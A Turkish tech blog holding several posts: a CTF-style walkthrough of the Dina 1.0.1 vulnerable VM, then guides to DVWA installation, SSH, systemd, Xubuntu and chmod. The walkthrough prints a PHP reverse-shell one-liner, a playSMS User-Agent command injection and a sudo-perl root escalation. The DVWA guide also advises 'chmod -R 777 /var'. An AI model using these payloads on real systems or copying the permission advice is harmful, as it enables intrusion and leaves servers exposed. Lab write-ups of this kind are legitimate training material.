3 Mart 2018 Cumartesi

Dina 1.0.1 Writeup



Goal: /root/flag.txt

Açıklamada yazıldığı üzere root dizini altındaki flag.txt dosyasına erişmemiz isteniyor.
O zaman zafiyetli makinamızın ip adresini bulalım.
Bu işlem için netdiscover aracını kullanacağız.


 netdiscover -i eth0 -r 192.168.1.0/24  


  Currently scanning: Finished!  |  Screen View: Unique Hosts           
  7 Captured ARP Req/Rep packets, from 4 hosts.  Total size: 420          
  ___________________________________________________________________________  
   IP      At MAC Address   Count   Len MAC Vendor / Hostname     
  -----------------------------------------------------------------------------  
  192.168.1.41  00:0c:29:41:82:7d   2   120 VMware, Inc.          
  192.168.1.1   4c:9e:ff:xx:xx:xx   3   180 Zyxel Communications Corpora  

Hedef ip üzerinde bilgi edinmek, çalışan servislere göz atmak için nmap taraması yapalım.

 nmap -sSV -n -v 192.168.1.41 --open  

 Starting Nmap 7.40 ( https://nmap.org ) at 2018-03-03 23:47 +03  
 NSE: Loaded 40 scripts for scanning.  
 Initiating ARP Ping Scan at 23:47  
 Scanning 192.168.1.41 [1 port]  
 Completed ARP Ping Scan at 23:47, 0.03s elapsed (1 total hosts)  
 Initiating SYN Stealth Scan at 23:47  
 Scanning 192.168.1.41 [1000 ports]  
 Discovered open port 80/tcp on 192.168.1.41  
 Completed SYN Stealth Scan at 23:47, 0.10s elapsed (1000 total ports)  
 Initiating Service scan at 23:47  
 Scanning 1 service on 192.168.1.41  
 Completed Service scan at 23:47, 6.07s elapsed (1 service on 1 host)  
 NSE: Script scanning 192.168.1.41.  
 Initiating NSE at 23:47  
 Completed NSE at 23:47, 0.00s elapsed  
 Initiating NSE at 23:47  
 Completed NSE at 23:47, 0.00s elapsed  
 Nmap scan report for 192.168.1.41  
 Host is up (0.000089s latency).  
 Not shown: 999 closed ports  
 Some closed ports may be reported as filtered due to --defeat-rst-ratelimit  
 PORT  STATE SERVICE VERSION  
 80/tcp open http  Apache httpd 2.2.22 ((Ubuntu))  
 MAC Address: 00:0C:29:41:82:7D (VMware)  

80. porttan yayın yaptığını görüyoruz. Tarayıcıdan girip göz atalım.



Web uygulaması olduğu için Nikto ile zafiyet taraması yapalım.

 nikto -h http://192.168.1.41/  


 - Nikto v2.1.6  
 ---------------------------------------------------------------------------  
 + Target IP:     192.168.1.41  
 + Target Hostname:  192.168.1.41  
 + Target Port:    80  
 + Start Time:     2018-03-03 23:53:32 (GMT3)  
 ---------------------------------------------------------------------------  
 + Server: Apache/2.2.22 (Ubuntu)  
 + Server leaks inodes via ETags, header found with file /, inode: 425463, size: 3618, mtime: Tue Oct 17 16:46:52 2017  
 + The anti-clickjacking X-Frame-Options header is not present.  
 + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS  
 + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type  
 + OSVDB-3268: /ange1/: Directory indexing found.  
 + Entry '/ange1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)  
 + OSVDB-3268: /angel1/: Directory indexing found.  
 + Entry '/angel1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)  
 + OSVDB-3268: /tmp/: Directory indexing found.  
 + Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)  
 + OSVDB-3268: /uploads/: Directory indexing found.  
 + Entry '/uploads/' in robots.txt returned a non-forbidden or redirect HTTP code (200)  
 + "robots.txt" contains 5 entries which should be manually viewed.  
 + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.  
 + Uncommon header 'tcn' found, with contents: list  
 + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html  
 + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS   
 + OSVDB-3268: /secure/: Directory indexing found.  
 + OSVDB-3092: /tmp/: This might be interesting...  
 + OSVDB-3233: /icons/README: Apache default file found.  
 + 8351 requests: 0 error(s) and 20 item(s) reported on remote host  
 + End Time:      2018-03-03 23:54:00 (GMT3) (28 seconds)  
 ---------------------------------------------------------------------------  
 + 1 host(s) tested  


Dirb aracı ile de dizinlere bakalım.


 dirb http://192.168.1.41/  

Bulduğumuz dizinleri incelemeye robots.txt ile başlayalım.

 ---- Scanning URL: http://192.168.1.41/ ----  
 + http://192.168.1.41/cgi-bin/ (CODE:403|SIZE:288)                 
 + http://192.168.1.41/index (CODE:200|SIZE:3618)                  
 + http://192.168.1.41/index.html (CODE:200|SIZE:3618)               
 + http://192.168.1.41/robots (CODE:200|SIZE:102)                  
 + http://192.168.1.41/robots.txt (CODE:200|SIZE:102)                
 ==> DIRECTORY: http://192.168.1.41/secure/                     
 + http://192.168.1.41/server-status (CODE:403|SIZE:293)              
 ==> DIRECTORY: http://192.168.1.41/tmp/                      
 ==> DIRECTORY: http://192.168.1.41/uploads/                    
 ---- Entering directory: http://192.168.1.41/secure/ ----  







nothing dizinini incelediğimizde sayfanın kaynak kodunda işimize yarar bilgiler buluyoruz.




Bu bilgileri bir yere not olarak bulduğumuz diğer dizinleri incelemeye devam edelim.

Dizinlere bakmaya secure ile devam ettiğimizde içinde secure backup.zip adlı dosyayı görüyoruz. 



Zipten çıkarmaya çalıştığımızda bizden parola istiyor.
 Az önce nothing dizininde bulduğumuz bilgileri deneyerek zipten çıkarıyoruz. parola:freedom

Zipten backup-cred.mp3 adlı bir dosya çıkıyor. 
File komutu ile incelediğimizde bir text dosyası olduğunu görüyoruz. 
( Linux'da dosya uzantılarının bir önemi yok ) cat ile dosyamızı okuyalım.



 I am not toooo smart in computer .......dat the resoan i always choose easy password...with creds backup file....  
 uname: touhid  
 password: ******  
 url : /SecreTSMSgatwayLogin  


Dosyayı okuduğumuzda bir dizin yoluna rastlıyoruz. 
Giriş yapmaya çalıştığımızda username ve password istiyor. 
username olarak touhid, parola olarakta nothing dizinindeki elde ettiğimiz bilgileri deniyoruz. 

parola:diana olarak giriş yapıyoruz.


playSMS adlı bir web uygulaması ile karşılaşıyoruz.

 Araştırmalarımız sonucunda komut çalıştırma zafiyetinin bulunduğunu görüyoruz.

https://www.exploit-db.com/exploits/42044/

Karşımıza çıkan panelde My Account sekmesinin altında Phonebook üzerinden dosya upload işlemi gerçekleştiriyoruz.

import.php dosyasında .csv uzantılı dosyaya payload’ı yazıp upload ediyoruz. Ardından user agent değerini çalıştıracağımız kod ile değiştiriyoruz. 
( Firefox üzerinde User-Agent switcher extensiondan yardım alarak yaptık )

Buraya atılan dosyanın formatı aşağıdaki gibi. Bu kısmın anlaşılması için yukardaki exploit-db linkinden detaylıca bakılması gerekiyor.



 

User agent kısmını “uname -a” komutu ile değiştiriyoruz. 
Değişikliğin ardından test.csv dosyasını import ettiğimizde kod çalışıyor olacak.






Komutun çalıştığını görüyoruz. Şimdi yapamamız gerek reverse bağlantı yapıp oturum elde etmek. 
Bunun için alltaki payloadı kullanıyoruz.

php -r '$sock=fsockopen("192.168.1.41",4444);exec("/bin/sh -i <&3 >&3 2>&3");'v

Bu komut ile 192.168.1.41 adresinin 4444. portuna bağlan, /bin/sh üzerinden bağlantı alabiliyoruz.
Kendi cihazımızda ise dinleme duruma geçmemiz gerekiyor.
nc -lvp 4444 komutu ile 4444. porta gelen bağlanma isteklerini dinliyoruz.


 




www-data kullanıcı ile giriş yaptık. Okumamız gereken dosya /root dizini altında. 
Bu dizine erişebilmemiz için ya root haklarına sahip olmamız gerekiyor ya da root haklarına sahip bir kullanıcıya erişmemiz gerekiyor.


sudo -l komutu ile /etc/sudoers dosyasındaki yetkilendirilmiş kullanıcıları görüntülüyoruz.




Perl kullanıcısı parolasız olarak root yetkisi ile çalıştığını görüyoruz.
sudo perl -e ‘exec “cat /root/flag.txt”;’ komutu ile de root dizini altındaki flag dosyamıza erişebiliyoruz.


 


  

29 Haziran 2017 Perşembe

DVWA Kurulumu


DVWA, üzerinde web zafiyetlerini barındıran local olarak denemeler yapabileceğimiz açık kaynak kodlu bir yazılımdır.



DVWA kurulumunu Ubuntu 16.10 sürümünde yapacağım. Kuruluma geçmeden önce sisteminizde LAMP ın kurulu olması gerekmektedir.

Kurulumu internette kolaylıkla bulunsada ben kurmaya çalıştığımda defalarca aynı hataları aldım. Tekrar karşılaşılması durumu içinde dökümantasyon oluşturmaya karar verdim. Umarım aynı durumla karşılaşanlar içinde faydalı olur.

--------

LAMP kurulu sistemimizde öncelikle apache2 ve mysql'in çalıştığından emin olmak için.

Komutları giriyoruz.


systemctl status apache2 

systemctl status mysql

Eğer ingilizce olarak kullanıyorsanız çıktılarda belirgin şekilde active(running) yazması gerekecektir.  deactive durumunda ise tekrar kontrol etmeniz gerekir.

DVWA   adresine tıklayarak Github'tan indirebilirsiniz. ya da git kullarak direk localhost'un çalıştığı dizini göstererek indirebilirsiniz.

İndirilen dosyayı  zip'ten çıkardıktan sonra /var/www/html içine klasör halinde atıyoruz.

Not: localhostta çalışırken olası izin hatalarıyla karşılamamak için dosyaları attıktan sonra /var dizinine recursive olarak bütün izinleri verelim.


chmod -R 777 /var


Daha sonra tarayıcıya localhost/DVWA-master yazdığımızda bize aşağıdaki uyarıyı verecek.






Bunun için :

cp /var/www/html/DVWA-master/config/config.inc.php.dist /var/www/html/DVWA-master/config/config.inc.php



Daha sonra vim kullanarak kopyalayıp yeniden isimlendirdiğimiz dosyanın içine giriyoruz.


vim /var/www/html/DVWA-master/config/config.inc.php




db_password kısmına mysql kurarken oluşturduğumuz parolayı giriyoruz.


Hemen aşağıda recaptcha_public_key  bölümü var. Üzerinde yorum satırı ile gösterilen google linkine tıklayıp gmail hesabımızı kullanarak kolaylıkla bir public key alabilirsiniz. İki adet key verecektir. Private olana ihtiyacımız yok. Yalnızca public key i bu bölüme yazıp kaydediyoruz.

( Bunları yapmadığınızda reCaptchaKey : Missing şeklinde bir uyarı veriyor )

Karşılaştığım hataları o an screenshot almadığım için yazarak anlatıyorum.

Daha sonra tekrardan localhost/DVWA-master dediğinizde setup ekranı karşınıza gelecektir. Normalde bu kısımda direk create database butonuna tıklayarak kurulumu yapıp yazılımı kullanabiliyorsunuz. Fakat ben yukardaki captcha hatası ve aşağıdaki diğer hataları aldığım için onlarında çözümlerini anlatacağım.


PHP function allow_url_include: Enabled

şeklinde bir uyarı veriyor.



 vim /etc/php/7.0/apache2/php.ini 

Bu hatayı çözmek için php.ini dosyamızda allow_url_include kısmını bulup Off olan kısmı On şeklinde düzeltiyoruz.

Daha sonra setup check ekranında

PHP module gd: Installed

diye bir hata daha veriyor. Bunun içinde php için gd kurulumu yapıyoruz. Php 7 sürümü için :


sudo apt-get install php-gd

Artık sorunsuz bir şekilde DVWA'yı kurmanız gerekir.






18 Şubat 2017 Cumartesi

Ubuntu SSH Kurulumu

SSH (Secure Shell )  : Güvenli veri iletimi için şifrelenmiş ağ protokolüdür. SSH ile bağlantı kuran cihazlar veri aktarımları ve diğer işlemleri şifrelenmiş bir ağ prokolü üzerinden yapar. SSH private key ve public key adında iki anahtar bulunur.





Yukardaki görselde iki client ve bir server bulunuyor. Clientlar private ve public iki adet anahtara sahip. .pub uzantılı dosya clientların public anahtarları. Diğer anahtarları ise private olanlar. Bağlanmak istediği sisteme public anahtarın taşınması gerekir. Private key'in ise bağlantıyı kuracağı sistemde bulunması gerekir. Digitalocean vs. sunucu hizmeti sağlayan yerlerden sunucu kiralamak istediğinizde sizden eğer şifresiz bağlanmak istiyorsanız, satın alırken public anahtarınızı soracaktır. Bu şekilde bağlantı kurmak kullancı adı şifre aşamasını ortadan kaldırır ve eğer birden fazla sunucu yönetiyorsanız hem daha pratik hem de güvenli bağlantı kurmanıza olanak sağlar. Bruteforce gibi saldırılarıda bu sayede engellemiş olursunuz.


SSH Servisi Kurulumu


 sudo apt-get install openssh-server  
 sudo apt-get install openssh-client  

Kurulum gerçekleştirdek sonra SSH Key oluşturmak için :

 ssh-keygen -t rsa  

komutu girilir. rsa diye yazılan keyin oluşturulurken kullanılan algoritma.

İlk olarak private key için konum soruyor. Default olarak bırakırsanız gösterdiği yerde oluşacaktır. Daha sonrası private key için bir parola soruyor. Eğer buraya bir parola girerseniz bağlantı yaparken private keyinizin parolasını size sorar.


 [root@hakan06 ~]# ssh-keygen -t rsa  
 Generating public/private rsa key pair.  
 Enter file in which to save the key (/root/.ssh/id_rsa):   
 Enter passphrase (empty for no passphrase):   
 Enter same passphrase again:   
 Your identification has been saved in /root/.ssh/id_rsa.  
 Your public key has been saved in /root/.ssh/id_rsa.pub.  
 The key fingerprint is:  
 52:7f:87:d3:70:97:cc:77:6d:3b:c5:b1:27:7f:c6:45 root@hakan06  
 The key's randomart image is:  
 +--[ RSA 2048]----+  
 |        .E|  
 |       oo=|  
 |    .  . o=@|  
 |    . .  = *B|  
 |   . S . + oo=|  
 |    .  . o .o|  
 |         |  
 |         |  
 |         |  
 +-----------------+  

Private key /root/.ssh/id_rsa public key ise /root/.ssh/id_rsa_pub  dosyasıdır Cat komutu ile bu iki keyi görüntüleyebilirsiniz.

Burada ssh için ayar dosyası bulunmaktadır.


 hakan@h4kan:/etc/ssh$ cat /etc/ssh/sshd_config  

Buradan ssh için varsayılan ayarlar bulunmaktadır. Detaylıca incelemek için yukarıdaki kodu yazarak görüntüleyebilirsiniz.

12 Şubat 2017 Pazar

Linux sistemlerde systemd ile servislerin yönetimi


systemd : Görevi bilgisayardaki sistem ve servislerin çalışmasını organize etmektir. Init sisteminin yetersiz kalması sonucu geliştirilmektedir.

Linux sistemin açılışı


Klasik linux açılışı
  • init yapısı – Sıralama zorunluluğu
  • Bir servis başlamadan, ona ihtiyaç duyan sıradaki servis başlatılmaz.
  • -Birbirine bağlı servisler, soketler ile iletişim

systemd açılışı

Systemd, tüm hizmet ve servislerin ihtiyaç duyduğu bağlanma
noktalarını, ilgili hizmet başlamasa dahi önceden başlatır ve diğer
bekleyen programların sırada beklemesini ortadan kaldırır. Bu şekilde systemd birbirine bağlı servisleri birbirlerine ihtiyaç duymadan başlatır.

Debian, Oracle, RHEL, Suse gibi linux dağıtımları eski SystemV yerine default olarak systemd kullanmaya başladılar. Systemd, yalnızca açılış servislerinin düzenlenmesini üstlenen init sistemine göre daha karmaşık, servisleri paralel olarak çalıştırabilme, automount, journal, system state snapshot desteği gibi bir çok özellik barındırmaktadır.

Unit Files

Unit file default olarak "/etc/systemd/system/" dizini altında bulunur. Bu dizinlerde birbirinden farklı uzanntılara sahip bir çok dosya vardır. Bu uzantılar birbirinden farklı unit tiplerini gösterir. .service uzantısına sahip dosyalar servislere ait unit dosyaları tutar. .target uzantılı dosyalar site bir çok service unit'nin gruplanmış halini gösterir. .mount uzantılı dosyalar sisteme mount edilmesi istenilen disk bölümlerini için tanımlanmış configleri gösterirken. .swap uzantılı dosyalar ise swap alanları için yapılandırma dosyalarını içerir.


 root@h4kan:/home/hakan# cd /etc/systemd/  
 root@h4kan:/etc/systemd# ls  
 bootchart.conf logind.conf resolved.conf system.conf   user  
 journald.conf  network   system     timesyncd.conf user.conf  
 root@h4kan:/etc/systemd# cd system  
 root@h4kan:/etc/systemd/system# ls  
 bluetooth.target.wants           hybrid-sleep.target.wants  
 dbus-org.bluez.service           multi-user.target.wants  
 dbus-org.freedesktop.Avahi.service     network-online.target.wants  
 dbus-org.freedesktop.ModemManager1.service paths.target.wants  
 dbus-org.freedesktop.nm-dispatcher.service printer.target.wants  
 dbus-org.freedesktop.thermald.service    shutdown.target.wants  
 default.target.wants            sockets.target.wants  
 display-manager.service           sshd.service  
 display-manager.service.wants        suspend.target.wants  
 getty.target.wants             sysinit.target.wants  
 graphical.target.wants           syslog.service  
 hibernate.target.wants           timers.target.wants  




Servislerin systemd ile yönetilmesi

Servisleri yönetmek için yaygın olarak systemctl aracı kullanılır.

Sytnax : systemctl start | stop | restart | reload | status servisadi.service

# systemctl start <hiz_adı>: Hizmet başlatma

# systemctl stop <hiz_adı>: Hizmet durdurma

# systemctl restart <hiz_adı>: Hizmeti yeniden başlatma

# systemctl status <hiz_adı> : Hizmetin durumu gösterme

# systemctl enable <hiz_adı>: Otomatik başlatma

# systemctl disable <hiz_adı>: Otomatik başlatma iptali

# systemctl mask <hiz_adı>: Servisi elle başlatmayı engelleme

# systemctl unmask <hiz_adı>: Elle başlatma engelini kaldırma

Linux sistemlerde görevleri, hizmet süreçleri ( service / daemon ) yerine getirir. Hizmet programları UNIX’te “daemon” olarak adlandırılır. Ve daemonların adları d harfi ile biter. Örnek: httpd, sshd, syslogd, crond, proftpd..


Klasik linux sistemlerinde hizmet programlarının betikleri “/etc/rc.d/init.d” veya “/etc/init.d” dizinin altında tutulur. Bu betikler (start | stop | restart | status | status | configtest) parametreleri kullanılarak çalıştırılabilir. Bu yolla süreçlerin yönetimi yapılır.

Hizmet süreçlerinin daha kolay yapılması için systemctl kullanılır. Ben burada httpd servisi için systemctl kullanarak apache servisini kullanacağım.

systemctl list-units --type service komutu ile sistemdeki bütün servisleri görüntüleriz.

 hakan@h4kan:~$ systemctl list-units --type service  
  UNIT            LOAD  ACTIVE SUB   DESCRIPTION  
  accounts-daemon.service   loaded active running Accounts Service  
  acpid.service        loaded active running ACPI event daemon  
  apache2.service       loaded active running LSB: Apache2 web server  
 ● apparmor.service      loaded failed failed LSB: AppArmor initialization  
  apport.service       loaded active exited LSB: automatic crash report   
  avahi-daemon.service    loaded active running Avahi mDNS/DNS-SD Stack  
  binfmt-support.service   loaded active exited Enable support for additiona  
  bluetooth.service      loaded active running Bluetooth service  
  console-setup.service    loaded active exited Set console font and keymap  
  cron.service        loaded active running Regular background program p  
  cups-browsed.service    loaded active running Make remote CUPS printers av  
  dbus.service        loaded active running D-Bus System Message Bus  
  getty@tty1.service     loaded active running Getty on tty1  
  grub-common.service     loaded active exited LSB: Record successful boot   
  hddtemp.service       loaded active exited LSB: disk temperature monito  
  irqbalance.service     loaded active running LSB: daemon to balance inter  
  keyboard-setup.service   loaded active exited Set console keymap  
  kmod-static-nodes.service  loaded active exited Create list of required stat  
  lightdm.service       loaded active running Light Display Manager  
  lm-sensors.service     loaded active exited Initialize hardware monitori  
  ModemManager.service    loaded active running Modem Manager  
  mysql.service        loaded active running MySQL Community Server  
 lines 1-23...skipping...  
  UNIT            LOAD  ACTIVE SUB   DESCRIPTION  
  accounts-daemon.service   loaded active running Accounts Service  
  acpid.service        loaded active running ACPI event daemon  
  apache2.service       loaded active running LSB: Apache2 web server  
 ● apparmor.service      loaded failed failed LSB: AppArmor initialization  
  apport.service       loaded active exited LSB: automatic crash report   
  avahi-daemon.service    loaded active running Avahi mDNS/DNS-SD Stack  
  binfmt-support.service   loaded active exited Enable support for additiona  
  bluetooth.service      loaded active running Bluetooth service  
  console-setup.service    loaded active exited Set console font and keymap  
  cron.service        loaded active running Regular background program p  
  cups-browsed.service    loaded active running Make remote CUPS printers av  
  dbus.service        loaded active running D-Bus System Message Bus  
  getty@tty1.service     loaded active running Getty on tty1  
  grub-common.service     loaded active exited LSB: Record successful boot   
  hddtemp.service       loaded active exited LSB: disk temperature monito  
  irqbalance.service     loaded active running LSB: daemon to balance inter  
  keyboard-setup.service   loaded active exited Set console keymap  
  kmod-static-nodes.service  loaded active exited Create list of required stat  
  lightdm.service       loaded active running Light Display Manager  
  lm-sensors.service     loaded active exited Initialize hardware monitori  
  ModemManager.service    loaded active running Modem Manager  
  mysql.service        loaded active running MySQL Community Server  
  networking.service     loaded active exited Raise network interfaces  
  NetworkManager-wait-online.service loaded active exited Network Manager Wait Online  
  NetworkManager.service   loaded active running Network Manager  
  ondemand.service      loaded active exited LSB: Set the CPU Frequency S  
  polkitd.service       loaded active running Authenticate and Authorize U  
  rc-local.service      loaded active exited /etc/rc.local Compatibility  
  resolvconf.service     loaded active exited Nameserver information manag  
  rsyslog.service       loaded active running System Logging Service  
  rtkit-daemon.service    loaded active running RealtimeKit Scheduling Polic  
  setvtrgb.service      loaded active exited Set console scheme  
  snapd.service        loaded active running Snappy daemon  
  speech-dispatcher.service  loaded active exited LSB: Speech Dispatcher  

Yukardaki çıktıda sadece aktif servisleri görüntüledik. Yazdığımız komuta ek olarak all parametresi ekleyerek tüm servisleri görüntüleriz.


systemctl list-units --type service --all inactive durumundaki servisleride görüntüleyebiliriz.

 hakan@h4kan:~$ systemctl list-units --type service --all  
  UNIT                        LOAD   ACTIVE  SUB   DESCRIPTION  
  accounts-daemon.service               loaded  active  running Accounts Service  
  acpid.service                    loaded  active  running ACPI event daemon  
  alsa-restore.service                loaded  inactive dead  Save/Restore Sound Card State  
  alsa-state.service                 loaded  inactive dead  Manage Sound Card State (restore and store)  
  anacron.service                   loaded  inactive dead  Run anacron jobs  
  apache2.service                   loaded  active  running LSB: Apache2 web server  
 ● apparmor.service                  loaded  failed  failed LSB: AppArmor initialization  
  apport.service                   loaded  active  exited LSB: automatic crash report generation  
  apt-daily.service                  loaded  inactive dead  Daily apt activities  
 ● auditd.service                   not-found inactive dead  auditd.service  
  avahi-daemon.service                loaded  active  running Avahi mDNS/DNS-SD Stack  
  binfmt-support.service               loaded  active  exited Enable support for additional executable binary formats  
  bluetooth.service                  loaded  active  running Bluetooth service  
  brltty.service                   loaded  inactive dead  Braille Device Support  
 ● cloud-init.service                 not-found inactive dead  cloud-init.service  
 ● console-screen.service               not-found inactive dead  console-screen.service  
  console-setup.service                loaded  active  exited Set console font and keymap  
  cron.service                    loaded  active  running Regular background program processing daemon  
  cups-browsed.service                loaded  active  running Make remote CUPS printers available locally  
  cups.service                    loaded  inactive dead  CUPS Scheduler  
  dbus.service                    loaded  active  running D-Bus System Message Bus  
  dns-clean.service                  loaded  inactive dead  Clean up any mess left by 0dns-up  
  emergency.service                  loaded  inactive dead  Emergency Shell  
  failsafe-x.service                 loaded  inactive dead  X.org diagnosis failsafe  
 ● festival.service                  not-found inactive dead  festival.service  
  friendly-recovery.service              loaded  inactive dead  Recovery mode menu  
  getty-static.service                loaded  inactive dead  getty on tty2-tty6 if dbus and logind are not available  
  getty@tty1.service                 loaded  active  running Getty on tty1  
  getty@tty7.service                 loaded  inactive dead  Getty on tty7  
  gpu-manager.service                 loaded  inactive dead  Detect the available GPUs and deal with any system changes  

systemctl list-unit-files --type service servislerin enable, disable durumunu görmek için bu komutu kullanırız.

 hakan@h4kan:~$ systemctl list-unit-files --type service  
 UNIT FILE                 STATE    
 accounts-daemon.service          enabled   
 acpid.service               disabled  
 alsa-restore.service            static   
 alsa-state.service             static   
 alsa-utils.service             masked   
 anacron-resume.service           enabled   
 anacron.service              enabled   
 apport-forward@.service          static   
 apt-daily.service             static   
 autovt@.service              enabled   
 avahi-daemon.service            enabled   
 binfmt-support.service           enabled   
 bluetooth.service             enabled   
 bootlogd.service              masked   
 bootlogs.service              masked   
 bootmisc.service              masked   
 brltty-udev.service            static   
 brltty.service               enabled   
 checkfs.service              masked   
 checkroot-bootclean.service        masked   
 checkroot.service             masked   
 colord.service               static   
 console-getty.service           disabled  
 console-setup.service           static   
 console-shell.service           disabled  
 container-getty@.service          static   
 cron.service                enabled   
 cryptdisks-early.service          masked   
 cryptdisks.service             masked   
 cups-browsed.service            enabled   
 cups.service                enabled   
 dbus-org.bluez.service           enabled   
 dbus-org.freedesktop.Avahi.service     enabled   
 dbus-org.freedesktop.hostname1.service   static   
 dbus-org.freedesktop.locale1.service    static   
 dbus-org.freedesktop.login1.service    static   
 dbus-org.freedesktop.ModemManager1.service enabled   
 dbus-org.freedesktop.network1.service   disabled  
 dbus-org.freedesktop.nm-dispatcher.service enabled   

Herhangi bir servisin durumunu öğrenmek içinde

systemctl status apache2 komutunu kullanırız. Ben apache2 servisinin durumuna bakıyorum.


 hakan@h4kan:~$ systemctl status apache2  
 ● apache2.service - LSB: Apache2 web server  
   Loaded: loaded (/etc/init.d/apache2; bad; vendor preset: enabled)  
  Drop-In: /lib/systemd/system/apache2.service.d  
       └─apache2-systemd.conf  
   Active: active (running) since Paz 2017-02-12 14:49:12 +03; 57min ago  
    Docs: man:systemd-sysv-generator(8)  
  Process: 1645 ExecStart=/etc/init.d/apache2 start (code=exited, status=0/SUCCESS)  
   CGroup: /system.slice/apache2.service  
       ├─1781 /usr/sbin/apache2 -k start  
       ├─1809 /usr/sbin/apache2 -k start  
       ├─1810 /usr/sbin/apache2 -k start  
       ├─1811 /usr/sbin/apache2 -k start  
       ├─1812 /usr/sbin/apache2 -k start  
       └─1813 /usr/sbin/apache2 -k start  
 Şub 12 14:49:11 h4kan systemd[1]: Starting LSB: Apache2 web server...  
 Şub 12 14:49:11 h4kan apache2[1645]: * Starting Apache httpd web server apache2  
 Şub 12 14:49:12 h4kan apache2[1645]: *  
 Şub 12 14:49:12 h4kan systemd[1]: Started LSB: Apache2 web server.  

Çıktıda görebileceğiniz gibi servisin loaded olduğu, servise ait unit file’ın tam path’inin/usr/lib/systemd/system/apache2.service.d olduğu ve startup’a ekli olduğu (enabled) görüntülenmektedir.

Ayrıca, servisin state’inin active (running) olduğu ve ne kadardır up olduğu bildirilmektedir. Main PID numarası Linux Control Group bilgileri ve servisin ürettiği logun son bir kısmı yer bildirilmektedir.

Servisi başlatmak için

#systemctl start httpd

servisi durdurmak için

#systemctl stop httpd

Servisi reload etmek için

#systemctl reload httpd 

Servisi restart etmek için

#systemctl restart httpd

Servislerin açılışta çalıştırılması için

#systemctl enable httpd 

servisin açılışta çalıştırılmaması için yani startuptan kaldırmak için

#systemctl disable httpd

Enable ettiğiniz bir servisin tekrar başlatılmaması için mask parametresi kullanılır.

#systemctl mask httpd 

maskı kaldırmak içinde unmask parametresi kullanılır.

#systemctl unmask httpd
  

Özetlersek systemd, Linux işletim sistemleri için geliştirilmiştir.
Amacı; bilgisayardaki sistem ve servislerin çalışmasını organize etmektir. systemd tabiki bununla kalmıyor ve çok fazla işlevi var. Ben genel hatlarıyla anlatmaya çalıştım.  

9 Şubat 2017 Perşembe

Ubuntu sistemi xubuntu yapmak

Ubuntu gnome masaüstü ortamını bir kaç adımda xubuntu hale getirebiliyoruz.

Terminalde : xubuntu deski indiriyoruz.

 sudo apt-get install xubuntu-desktop gksu leafpad synaptic  

Paket kurulduktan sonra, sisteminizden log-out olmanız gerekir. Olduktan sonra sağ üstteki ubuntu logosuna tıklayıp xubuntu yapın.

xubuntu şeklinde giriş yaptıktan sonra, gnome ile ilgili problemlerin çıkmaması adına bazı paketleri siliyoruz.

 sudo apt-get remove nautilus gnome-power-manager gnome-screensaver gnome-termina* gnome-pane* gnome-applet* gnome-bluetooth gnome-desktop* gnome-sessio* gnome-user* gnome-shell-common compiz compiz* unity unity* hud zeitgeist zeitgeist* python-zeitgeist libzeitgeist* activity-log-manager-common gnome-control-center gnome-screenshot overlay-scrollba* && sudo apt-get install xubuntu-community-wallpapers && sudo apt-get autoremove  

Bu işlem bittikten sonra sistemi reboot ediyoruz.

Yukardaki işlem bizim bazı sorunları almamızı engelledi fakat gnome yazılımıda bu işlemde istemeden silindi. Yazılım deposunu tekrar almak için :


 sudo apt-get install gnome-software  

Sisteminiz xubuntuya döndü. Xubuntuyu eklentilerle daha güzel bir hale getirmeniz için https://sites.google.com/site/easylinuxtipsproject/first-xubuntu ziyaret edebilirsiniz.

21 Mayıs 2016 Cumartesi

Linux chmod, chown komutları

chmod : Dosya ve dizinlerin izinlerini değiştirmek için kullanılır.

Örnek :

dosya1 ve bir dizin oluştururuz. izinleri aşağıdaki gibidir.

drwxr-xr-x  2 root root 4096 May 19 00:59 dizin1/
-rw-r--r--  1 root root    0 May 19 00:59 dosya1

rwx = 111 in binary = 7
rw- = 110 in binary = 6
r-x = 101 in binary = 5
r-- = 100 in binary = 4


şeklindedir. ve biz bunları 755 olarak değiştirmek istiyoruz.

hakan eren # touch dosya1
hakan eren # mkdir dizin1
hakan eren # ll
total 40
drwxr-xr-x  5 root root 4096 May 19 00:59 ./
drwx------ 26 root root 4096 May 18 04:42 ../
drwxr-xr-x  2 root root 4096 May 19 00:59 dizin1/
-rw-r--r--  1 root root    0 May 19 00:59 dosya1
-rw-r--r--  1 root root    0 May 16 05:00 ornek1.html
drwxr-xr-x  2 root root 4096 May 17 02:11 ornek2/
drwxr-xr-x  2 root root 4096 May 17 02:11 ornek3/
-rw-r--r--  1 root root   31 May 17 02:12 ornek4
-rw-r--r--  1 root root   29 May 17 02:20 ornek5
-rw-r--r--  1 root root   23 May 17 02:22 ornek7
-rw-r--r--  1 root root   31 May 17 02:23 ornek8
-rw-r--r--  1 root root   31 May 17 02:22 ornek9
hakan eren # chmod 755 dosya1
hakan eren # ll
total 40
drwxr-xr-x  5 root root 4096 May 19 00:59 ./
drwx------ 26 root root 4096 May 18 04:42 ../
drwxr-xr-x  2 root root 4096 May 19 00:59 dizin1/
-rwxr-xr-x  1 root root    0 May 19 00:59 dosya1*
-rw-r--r--  1 root root    0 May 16 05:00 ornek1.html
drwxr-xr-x  2 root root 4096 May 17 02:11 ornek2/
drwxr-xr-x  2 root root 4096 May 17 02:11 ornek3/
-rw-r--r--  1 root root   31 May 17 02:12 ornek4
-rw-r--r--  1 root root   29 May 17 02:20 ornek5
-rw-r--r--  1 root root   23 May 17 02:22 ornek7
-rw-r--r--  1 root root   31 May 17 02:23 ornek8
-rw-r--r--  1 root root   31 May 17 02:22 ornek9


en baştaki 7 sahibi ile ilgili ortadaki grubu en sondaki diğerleri ile ilgili izinleri belirtiriz.

Aynı işlemi sayısal ifadelerle yapabileceğimiz gibi sembolik ifadelerlede kullanabiliriz.

chmod o-x dosya1 dediğimizde dosya1'den çalışma iznini diğer userlardan siler. o parametresi other anlamında kullanılır.


hakan eren # chmod o-x dosya1
hakan eren # ll
total 40
drwxr-xr-x  5 root root 4096 May 19 00:59 ./
